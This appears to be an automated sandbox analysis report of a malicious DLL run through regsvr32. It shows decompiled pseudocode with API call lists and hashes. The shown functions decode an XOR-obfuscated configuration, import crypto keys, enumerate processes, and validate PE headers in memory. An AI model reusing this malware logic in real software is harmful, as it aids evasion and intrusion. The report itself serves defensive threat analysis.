                                      • Part of subcall function 6E2A1D96: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 6E2A1DCF
                                      • Part of subcall function 6E2A1D96: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 6E2A1E44
                                      • Part of subcall function 6E2A1D96: GetLastError.KERNEL32 ref: 6E2A1E4A
                                    • GetLastError.KERNEL32 ref: 6E2A1BD3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 2673762927-0
                                    • Opcode ID: 3b62d01c878a8d3817ae1e2572123bba899bc1333192cb6f0c14a79f0bd3397c
                                    • Instruction ID: cfcc2937eea70d9f96997258f83d32b7eceb793c48ef7139edc7d65ef2bfa857
                                    • Opcode Fuzzy Hash: 3b62d01c878a8d3817ae1e2572123bba899bc1333192cb6f0c14a79f0bd3397c
                                    • Instruction Fuzzy Hash: B9113BBA60070AABD3109ADDCDC0DDF73BEAF893247040919EB0397504FB60ED4A87A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A6A1E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                    				void* _t24;
                                    				signed short _t25;
                                    				signed int _t27;
                                    				intOrPtr* _t28;
                                    				signed short _t29;
                                    
                                    				_t28 = __edi;
                                    				if(_a4 == 0) {
                                    					L2:
                                    					_t29 = E001A15D7(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                    					if(_t29 == 0) {
                                    						_t27 = _a12 >> 1;
                                    						if(_t27 == 0) {
                                    							_t29 = 2;
                                    							HeapFree( *0x1aa290, 0, _a4);
                                    						} else {
                                    							_t24 = _a4;
                                    							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                                    							 *_t28 = _t24;
                                    						}
                                    					}
                                    					L6:
                                    					return _t29;
                                    				}
                                    				_t25 = E001A5D1D(_a4, _a8, _a12, __edi); // executed
                                    				_t29 = _t25;
                                    				if(_t29 == 0) {
                                    					goto L6;
                                    				}
                                    				goto L2;
                                    			}









                                    APIs
                                      • Part of subcall function 001A5D1D: SysFreeString.OLEAUT32(00000000), ref: 001A5D83
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A6A7F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Free$HeapString
                                    • String ID:
                                    • API String ID: 3806048269-0
                                    • Opcode ID: 6d2e705170da1ba5d126e4348a15985d542abdd8a3bd85bfe2e17a1d2d2a9854
                                    • Instruction ID: 641da3e80c4cdd5f2404a6b3cd2c54602e616cb2102fa69764c8b460c7469cbb
                                    • Opcode Fuzzy Hash: 6d2e705170da1ba5d126e4348a15985d542abdd8a3bd85bfe2e17a1d2d2a9854
                                    • Instruction Fuzzy Hash: BA01F63A100619BBCB229F84CC05FEA3B69FB16790F188029FE05AB120D731D960DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E001A488A(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                    				void* _t13;
                                    				void* _t21;
                                    
                                    				_t11 =  &_a4;
                                    				_t21 = 0;
                                    				__imp__( &_a8);
                                    				_t13 = E001A3FAB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                    				if(_t13 == 0) {
                                    					_t21 = E001A77D7(_a8 + _a8);
                                    					if(_t21 != 0) {
                                    						E001A4324(_a4, _t21, _t23);
                                    					}
                                    					E001A77EC(_a4);
                                    				}
                                    				return _t21;
                                    			}






                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A489B
                                      • Part of subcall function 001A3FAB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001A48AF,00000001,001A72E3,00000000), ref: 001A3FE3
                                      • Part of subcall function 001A3FAB: memcpy.NTDLL(001A48AF,001A72E3,00000010,?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000), ref: 001A3FFC
                                      • Part of subcall function 001A3FAB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001A4025
                                      • Part of subcall function 001A3FAB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001A403D
                                      • Part of subcall function 001A3FAB: memcpy.NTDLL(00000000,00000000,032F9858,00000010), ref: 001A408F
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                    • String ID:
                                    • API String ID: 894908221-0
                                    • Opcode ID: 69426237203d36321cb5453e18020704d0a6db18ea3071a3321ac597967acbbb
                                    • Instruction ID: ec45c3458601b8e9c0311ba4cfafa65e8568b2fd308d7728cf78082205f14139
                                    • Opcode Fuzzy Hash: 69426237203d36321cb5453e18020704d0a6db18ea3071a3321ac597967acbbb
                                    • Instruction Fuzzy Hash: 6CF0FE7B100108BBCF116F95EC45DEB3BADEF96364B008022FD19CA511DB71DA55DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 95%
                                    			E001A2654(int* __ecx) {
                                    				int _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* __esi;
                                    				signed int _t28;
                                    				signed int _t33;
                                    				signed int _t39;
                                    				char* _t45;
                                    				char* _t46;
                                    				char* _t47;
                                    				char* _t48;
                                    				char* _t49;
                                    				char* _t50;
                                    				void* _t51;
                                    				void* _t52;
                                    				intOrPtr _t53;
                                    				signed int _t59;
                                    				void* _t61;
                                    				void* _t62;
                                    				signed int _t64;
                                    				signed int _t67;
                                    				signed int _t71;
                                    				signed int _t75;
                                    				signed int _t79;
                                    				signed int _t83;
                                    				signed int _t87;
                                    				void* _t92;
                                    				intOrPtr _t109;
                                    
                                    				_t93 = __ecx;
                                    				_t28 =  *0x1aa2d0; // 0x69b25f44
                                    				if(E001A57E5( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                    					 *0x1aa324 = _v8;
                                    				}
                                    				_t33 =  *0x1aa2d0; // 0x69b25f44
                                    				if(E001A57E5( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                    					_v12 = 2;
                                    					L57:
                                    					return _v12;
                                    				}
                                    				_t39 =  *0x1aa2d0; // 0x69b25f44
                                    				if(E001A57E5( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                    					L55:
                                    					HeapFree( *0x1aa290, 0, _v16);
                                    					goto L57;
                                    				} else {
                                    					_t92 = _v12;
                                    					if(_t92 == 0) {
                                    						_t45 = 0;
                                    					} else {
                                    						_t87 =  *0x1aa2d0; // 0x69b25f44
                                    						_t45 = E001A3154(_t93, _t92, _t87 ^ 0x7895433b);
                                    					}
                                    					if(_t45 != 0) {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                    							 *0x1aa298 = _v8;
                                    						}
                                    					}
                                    					if(_t92 == 0) {
                                    						_t46 = 0;
                                    					} else {
                                    						_t83 =  *0x1aa2d0; // 0x69b25f44
                                    						_t46 = E001A3154(_t93, _t92, _t83 ^ 0x219b08c7);
                                    					}
                                    					if(_t46 != 0) {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                    							 *0x1aa29c = _v8;
                                    						}
                                    					}
                                    					if(_t92 == 0) {
                                    						_t47 = 0;
                                    					} else {
                                    						_t79 =  *0x1aa2d0; // 0x69b25f44
                                    						_t47 = E001A3154(_t93, _t92, _t79 ^ 0x31fc0661);
                                    					}
                                    					if(_t47 != 0) {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                    							 *0x1aa2a0 = _v8;
                                    						}
                                    					}
                                    					if(_t92 == 0) {
                                    						_t48 = 0;
                                    					} else {
                                    						_t75 =  *0x1aa2d0; // 0x69b25f44
                                    						_t48 = E001A3154(_t93, _t92, _t75 ^ 0x0cd926ce);
                                    					}
                                    					if(_t48 != 0) {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                    							 *0x1aa004 = _v8;
                                    						}
                                    					}
                                    					if(_t92 == 0) {
                                    						_t49 = 0;
                                    					} else {
                                    						_t71 =  *0x1aa2d0; // 0x69b25f44
                                    						_t49 = E001A3154(_t93, _t92, _t71 ^ 0x3cd8b2cb);
                                    					}
                                    					if(_t49 != 0) {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                    							 *0x1aa02c = _v8;
                                    						}
                                    					}
                                    					if(_t92 == 0) {
                                    						_t50 = 0;
                                    					} else {
                                    						_t67 =  *0x1aa2d0; // 0x69b25f44
                                    						_t50 = E001A3154(_t93, _t92, _t67 ^ 0x2878b929);
                                    					}
                                    					if(_t50 == 0) {
                                    						L41:
                                    						 *0x1aa2a4 = 5;
                                    						goto L42;
                                    					} else {
                                    						_t93 =  &_v8;
                                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                    							goto L41;
                                    						} else {
                                    							L42:
                                    							if(_t92 == 0) {
                                    								_t51 = 0;
                                    							} else {
                                    								_t64 =  *0x1aa2d0; // 0x69b25f44
                                    								_t51 = E001A3154(_t93, _t92, _t64 ^ 0x261a367a);
                                    							}
                                    							if(_t51 != 0) {
                                    								_push(_t51);
                                    								_t61 = 0x10;
                                    								_t62 = E001A496F(_t61);
                                    								if(_t62 != 0) {
                                    									_push(_t62);
                                    									E001A1000();
                                    								}
                                    							}
                                    							if(_t92 == 0) {
                                    								_t52 = 0;
                                    							} else {
                                    								_t59 =  *0x1aa2d0; // 0x69b25f44
                                    								_t52 = E001A3154(_t93, _t92, _t59 ^ 0xb9d404b2);
                                    							}
                                    							if(_t52 != 0 && E001A496F(0, _t52) != 0) {
                                    								_t109 =  *0x1aa37c; // 0x32f9858
                                    								E001A25ED(_t109 + 4, _t57);
                                    							}
                                    							_t53 =  *0x1aa2d4; // 0x314d7d0
                                    							_t22 = _t53 + 0x1ab2d2; // 0x32f8aa2
                                    							_t23 = _t53 + 0x1ab7c4; // 0x6976612e
                                    							 *0x1aa320 = _t22;
                                    							 *0x1aa390 = _t23;
                                    							HeapFree( *0x1aa290, 0, _t92);
                                    							_v12 = 0;
                                    							goto L55;
                                    						}
                                    					}
                                    				}
                                    			}
































                                    APIs
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A26F9
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A272B
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A275D
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A278F
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A27C1
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A27F3
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 001A2896
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 001A28A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: ~Bu
                                    • API String ID: 3298025750-1087964839
                                    • Opcode ID: dfbf88b24b69059f1f7b415c789fc8a0870024df0582ed92fed87be2c95ddec5
                                    • Instruction ID: 45c313ae09d02a8f3fb82c831ab382a40508cf62af685dc9d30c7cf3ef812fcf
                                    • Opcode Fuzzy Hash: dfbf88b24b69059f1f7b415c789fc8a0870024df0582ed92fed87be2c95ddec5
                                    • Instruction Fuzzy Hash: 98717278A00204AACB11DBFCCD89EAF77E9AF5B700B640826F402D3615EB35DE44DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E2A2495(long _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				short* _v32;
                                    				void _v36;
                                    				void* _t57;
                                    				signed int _t58;
                                    				signed int _t61;
                                    				signed int _t62;
                                    				void* _t63;
                                    				signed int* _t68;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t72;
                                    				intOrPtr _t75;
                                    				void* _t76;
                                    				signed int _t77;
                                    				void* _t78;
                                    				void _t80;
                                    				signed int _t81;
                                    				signed int _t84;
                                    				signed int _t86;
                                    				short* _t87;
                                    				void* _t89;
                                    				signed int* _t90;
                                    				long _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				signed int _t100;
                                    				signed int _t102;
                                    				void* _t104;
                                    				long _t108;
                                    				signed int _t110;
                                    
                                    				_t108 = _a4;
                                    				_t76 =  *(_t108 + 8);
                                    				if((_t76 & 0x00000003) != 0) {
                                    					L3:
                                    					return 0;
                                    				}
                                    				_a4 =  *[fs:0x4];
                                    				_v8 =  *[fs:0x8];
                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                    					_t102 =  *(_t108 + 0xc);
                                    					__eflags = _t102 - 0xffffffff;
                                    					if(_t102 != 0xffffffff) {
                                    						_t91 = 0;
                                    						__eflags = 0;
                                    						_a4 = 0;
                                    						_t57 = _t76;
                                    						do {
                                    							_t80 =  *_t57;
                                    							__eflags = _t80 - 0xffffffff;
                                    							if(_t80 == 0xffffffff) {
                                    								goto L9;
                                    							}
                                    							__eflags = _t80 - _t91;
                                    							if(_t80 >= _t91) {
                                    								L20:
                                    								_t63 = 0;
                                    								L60:
                                    								return _t63;
                                    							}
                                    							L9:
                                    							__eflags =  *(_t57 + 4);
                                    							if( *(_t57 + 4) != 0) {
                                    								_t12 =  &_a4;
                                    								 *_t12 = _a4 + 1;
                                    								__eflags =  *_t12;
                                    							}
                                    							_t91 = _t91 + 1;
                                    							_t57 = _t57 + 0xc;
                                    							__eflags = _t91 - _t102;
                                    						} while (_t91 <= _t102);
                                    						__eflags = _a4;
                                    						if(_a4 == 0) {
                                    							L15:
                                    							_t81 =  *0x6e2a41f8;
                                    							_t110 = _t76 & 0xfffff000;
                                    							_t58 = 0;
                                    							__eflags = _t81;
                                    							if(_t81 <= 0) {
                                    								L18:
                                    								_t104 = _t102 | 0xffffffff;
                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                    								__eflags = _t61;
                                    								if(_t61 < 0) {
                                    									_t62 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t62 = _a4;
                                    								}
                                    								__eflags = _t62;
                                    								if(_t62 == 0) {
                                    									L59:
                                    									_t63 = _t104;
                                    									goto L60;
                                    								} else {
                                    									__eflags = _v12 - 0x1000000;
                                    									if(_v12 != 0x1000000) {
                                    										goto L59;
                                    									}
                                    									__eflags = _v16 & 0x000000cc;
                                    									if((_v16 & 0x000000cc) == 0) {
                                    										L46:
                                    										_t63 = 1;
                                    										 *0x6e2a4240 = 1;
                                    										__eflags =  *0x6e2a4240;
                                    										if( *0x6e2a4240 != 0) {
                                    											goto L60;
                                    										}
                                    										_t84 =  *0x6e2a41f8;
                                    										__eflags = _t84;
                                    										_t93 = _t84;
                                    										if(_t84 <= 0) {
                                    											L51:
                                    											__eflags = _t93;
                                    											if(_t93 != 0) {
                                    												L58:
                                    												 *0x6e2a4240 = 0;
                                    												goto L5;
                                    											}
                                    											_t77 = 0xf;
                                    											__eflags = _t84 - _t77;
                                    											if(_t84 <= _t77) {
                                    												_t77 = _t84;
                                    											}
                                    											_t94 = 0;
                                    											__eflags = _t77;
                                    											if(_t77 < 0) {
                                    												L56:
                                    												__eflags = _t84 - 0x10;
                                    												if(_t84 < 0x10) {
                                    													_t86 = _t84 + 1;
                                    													__eflags = _t86;
                                    													 *0x6e2a41f8 = _t86;
                                    												}
                                    												goto L58;
                                    											} else {
                                    												do {
                                    													_t68 = 0x6e2a4200 + _t94 * 4;
                                    													_t94 = _t94 + 1;
                                    													__eflags = _t94 - _t77;
                                    													 *_t68 = _t110;
                                    													_t110 =  *_t68;
                                    												} while (_t94 <= _t77);
                                    												goto L56;
                                    											}
                                    										}
                                    										_t69 = 0x6e2a41fc + _t84 * 4;
                                    										while(1) {
                                    											__eflags =  *_t69 - _t110;
                                    											if( *_t69 == _t110) {
                                    												goto L51;
                                    											}
                                    											_t93 = _t93 - 1;
                                    											_t69 = _t69 - 4;
                                    											__eflags = _t93;
                                    											if(_t93 > 0) {
                                    												continue;
                                    											}
                                    											goto L51;
                                    										}
                                    										goto L51;
                                    									}
                                    									_t87 = _v32;
                                    									__eflags =  *_t87 - 0x5a4d;
                                    									if( *_t87 != 0x5a4d) {
                                    										goto L59;
                                    									}
                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                    									__eflags =  *_t71 - 0x4550;
                                    									if( *_t71 != 0x4550) {
                                    										goto L59;
                                    									}
                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                    										goto L59;
                                    									}
                                    									_t78 = _t76 - _t87;
                                    									__eflags =  *((short*)(_t71 + 6));
                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                    										goto L59;
                                    									}
                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                    									__eflags = _t78 - _t72;
                                    									if(_t78 < _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                    										goto L20;
                                    									}
                                    									goto L46;
                                    								}
                                    							} else {
                                    								goto L16;
                                    							}
                                    							while(1) {
                                    								L16:
                                    								__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 + 1;
                                    								__eflags = _t58 - _t81;
                                    								if(_t58 < _t81) {
                                    									continue;
                                    								}
                                    								goto L18;
                                    							}
                                    							__eflags = _t58;
                                    							if(_t58 <= 0) {
                                    								goto L5;
                                    							}
                                    							 *0x6e2a4240 = 1;
                                    							__eflags =  *0x6e2a4240;
                                    							if( *0x6e2a4240 != 0) {
                                    								goto L5;
                                    							}
                                    							__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
                                    							if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
                                    								L32:
                                    								_t100 = 0;
                                    								__eflags = _t58;
                                    								if(_t58 < 0) {
                                    									L34:
                                    									 *0x6e2a4240 = 0;
                                    									goto L5;
                                    								} else {
                                    									goto L33;
                                    								}
                                    								do {
                                    									L33:
                                    									_t90 = 0x6e2a4200 + _t100 * 4;
                                    									_t100 = _t100 + 1;
                                    									__eflags = _t100 - _t58;
                                    									 *_t90 = _t110;
                                    									_t110 =  *_t90;
                                    								} while (_t100 <= _t58);
                                    								goto L34;
                                    							}
                                    							_t58 = _t81 - 1;
                                    							__eflags = _t58;
                                    							if(_t58 < 0) {
                                    								L28:
                                    								__eflags = _t81 - 0x10;
                                    								if(_t81 < 0x10) {
                                    									_t81 = _t81 + 1;
                                    									__eflags = _t81;
                                    									 *0x6e2a41f8 = _t81;
                                    								}
                                    								_t58 = _t81 - 1;
                                    								goto L32;
                                    							} else {
                                    								goto L25;
                                    							}
                                    							while(1) {
                                    								L25:
                                    								__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 - 1;
                                    								__eflags = _t58;
                                    								if(_t58 >= 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							__eflags = _t58;
                                    							if(__eflags >= 0) {
                                    								if(__eflags == 0) {
                                    									goto L34;
                                    								}
                                    								goto L32;
                                    							}
                                    							goto L28;
                                    						}
                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                    						__eflags = _t75 - _v8;
                                    						if(_t75 < _v8) {
                                    							goto L20;
                                    						}
                                    						__eflags = _t75 - _t108;
                                    						if(_t75 >= _t108) {
                                    							goto L20;
                                    						}
                                    						goto L15;
                                    					}
                                    					L5:
                                    					_t63 = 1;
                                    					goto L60;
                                    				} else {
                                    					goto L3;
                                    				}
                                    			}





































                                    APIs
                                    • NtQueryVirtualMemory.NTDLL ref: 6E2A2546
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: MemoryQueryVirtual
                                    • String ID: @B*n$@B*n$@B*n
                                    • API String ID: 2850889275-250757524
                                    • Opcode ID: e41d41d7feb185d93986887bc5b7890fc710bf0ebc6c90ded88ce9d3452e4d3e
                                    • Instruction ID: 9a2c1d991ede8dcaa14f153a5bc977fcb9650bc85f402862cfa51ad7f52ea154
                                    • Opcode Fuzzy Hash: e41d41d7feb185d93986887bc5b7890fc710bf0ebc6c90ded88ce9d3452e4d3e
                                    • Instruction Fuzzy Hash: 3261E2B261560FCFEB49CEAFD8A065933B7FB85715B248429DB15C7284FB30D882C650
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E001A11B8() {
                                    				char _v264;
                                    				void* _v300;
                                    				int _t8;
                                    				intOrPtr _t9;
                                    				int _t15;
                                    				void* _t17;
                                    
                                    				_t15 = 0;
                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                    				if(_t17 != 0) {
                                    					_t8 = Process32First(_t17,  &_v300);
                                    					while(_t8 != 0) {
                                    						_t9 =  *0x1aa2d4; // 0x314d7d0
                                    						_t2 = _t9 + 0x1abde4; // 0x73617661
                                    						_push( &_v264);
                                    						if( *0x1aa118() != 0) {
                                    							_t15 = 1;
                                    						} else {
                                    							_t8 = Process32Next(_t17,  &_v300);
                                    							continue;
                                    						}
                                    						L7:
                                    						CloseHandle(_t17);
                                    						goto L8;
                                    					}
                                    					goto L7;
                                    				}
                                    				L8:
                                    				return _t15;
                                    			}










                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A11C8
                                    • Process32First.KERNEL32(00000000,?), ref: 001A11DB
                                    • Process32Next.KERNEL32(00000000,?), ref: 001A1207
                                    • CloseHandle.KERNEL32(00000000), ref: 001A1216
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 9628e0b2d0853e4844422c4c920b95563d4f76886b61e91c14259b8569ebf53c
                                    • Instruction ID: 11e8bca74a2fae08b447468a8d52e0175734d963b082613cd7368c5bc49953a2
                                    • Opcode Fuzzy Hash: 9628e0b2d0853e4844422c4c920b95563d4f76886b61e91c14259b8569ebf53c
                                    • Instruction Fuzzy Hash: EBF0907E2011247AD720A6769C49FEB77ACDFD7350F1100A2F905C2001EB64DA9586A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E2A1C6F() {
                                    				void* _t1;
                                    				long _t3;
                                    				void* _t4;
                                    				long _t5;
                                    				void* _t6;
                                    				intOrPtr _t8;
                                    
                                    				_t8 =  *0x6e2a41b0;
                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                    				 *0x6e2a41bc = _t1;
                                    				if(_t1 == 0) {
                                    					return GetLastError();
                                    				}
                                    				_t3 = GetVersion();
                                    				if(_t3 <= 5) {
                                    					_t4 = 0x32;
                                    					return _t4;
                                    				} else {
                                    					 *0x6e2a41ac = _t3;
                                    					_t5 = GetCurrentProcessId();
                                    					 *0x6e2a41a8 = _t5;
                                    					 *0x6e2a41b0 = _t8;
                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                    					 *0x6e2a41a4 = _t6;
                                    					if(_t6 == 0) {
                                    						 *0x6e2a41a4 =  *0x6e2a41a4 | 0xffffffff;
                                    					}
                                    					return 0;
                                    				}
                                    			}










                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2A1A30,74EC325B,00000000), ref: 6E2A1C7E
                                    • GetVersion.KERNEL32 ref: 6E2A1C8D
                                    • GetCurrentProcessId.KERNEL32 ref: 6E2A1C9C
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2A1CB5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CreateCurrentEventOpenVersion
                                    • String ID:
                                    • API String ID: 845504543-0
                                    • Opcode ID: c8411445bcfde97a392ef56a9a86f6c453317be6fa9d8acdfada56c64ad935c4
                                    • Instruction ID: ae7918485d24a90383fa1d605fb725aeadc7de54391ff589fb4634b2f7d69fb4
                                    • Opcode Fuzzy Hash: c8411445bcfde97a392ef56a9a86f6c453317be6fa9d8acdfada56c64ad935c4
                                    • Instruction Fuzzy Hash: 34F01771644E11EFEF509FACA80D78E3BA7B716722F19412AE205DA1C0DBB08483CB75
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E2C741F
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2C7429
